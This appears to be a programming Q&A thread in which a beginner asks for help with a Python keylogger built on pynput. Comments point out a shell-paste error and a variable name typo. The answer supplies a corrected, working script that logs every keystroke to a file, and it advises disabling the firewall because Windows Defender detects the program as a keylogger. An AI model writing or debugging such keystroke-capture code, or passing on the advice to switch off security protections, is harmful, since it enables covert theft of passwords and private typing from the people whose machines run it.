# My python keylogger isn't loading with SyntaxError

Tags: python, helper, keylogger

I'm trying to make a keylogger for the first time, but I have a problem when I try and run the .pyw file it don't show in my task manger and it don't log my key strokes, I've turned off anti-virus and everything it's not working. I'm new to python and I put it in IDLE Shell and it said "SyntaxError: multiple statements found while compiling a single statement". Can someone please help me with this, and yes I have pynput installed.

```
Error: "SyntaxError: multiple statements found while compiling a single statement"
```

Python Version: 3.9.1

Code:

```
from pynput.keyboard import Key, Listener 
import logging

log_dir = " "

logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='% (asctime)s: %(message)s')

def on_press(key):
    logging.info(key)

with Listener(on_press=on_press) as Listener:
    listener.join()
```

Comment: Don't paste your code into the shell. Create a new `.py` Python script file. Paste your code into the file, save it, and then execute it.

Comment: Paul M, I did that aswell and it still didn't work.

Comment: OK. Does the error include any other information?

Comment: I'm new to python, and I don't fully understand what everything is, but the main problem is that the logger won't stay open

Comment: and no it don't include more than the "SyntaxError: multiple statements found while compiling a single statement"

Comment: So you're saying there is no syntax error message when you put the code in a file?

Comment: No there isn't it just closes the file which is supposed to happen,  but it dont stay up and running

Comment: Not sure if this is the cause of your problems, but shouldn't it be `with ... as listener` instead of `with ... as Listener`? Lower-case `l`, not upper `L`. The way it's written now, it should raise a `NameError`.

Answer (score 0):

This worked for me. Make sure your firewall is turned off windows defender detected it as a keylogger

```
from pynput.keyboard import Key, Listener 
import logging

log_dir = ""

logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    if key == Key.esc:
        listener.stop()
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```